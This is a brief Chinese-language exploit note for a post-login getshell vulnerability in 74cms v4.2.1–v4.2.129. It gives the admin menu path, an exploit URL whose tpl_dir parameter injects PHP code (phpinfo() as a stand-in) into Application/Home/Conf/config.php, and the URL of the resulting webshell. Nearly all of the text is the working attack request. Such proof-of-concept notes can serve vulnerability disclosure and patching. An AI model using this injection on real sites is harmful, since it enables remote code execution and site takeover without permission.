74cms v4.2.1-v4.2.129 後台getshell漏洞

漏洞利用

管理面板-風格模板-工具-點擊可用模板抓包

url: http://74cms.test/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',phpinfo(),'

webshell:http://74cms.test/Application/Home/Conf/config.php


\74cms\upload\Application\Home\Conf\config.php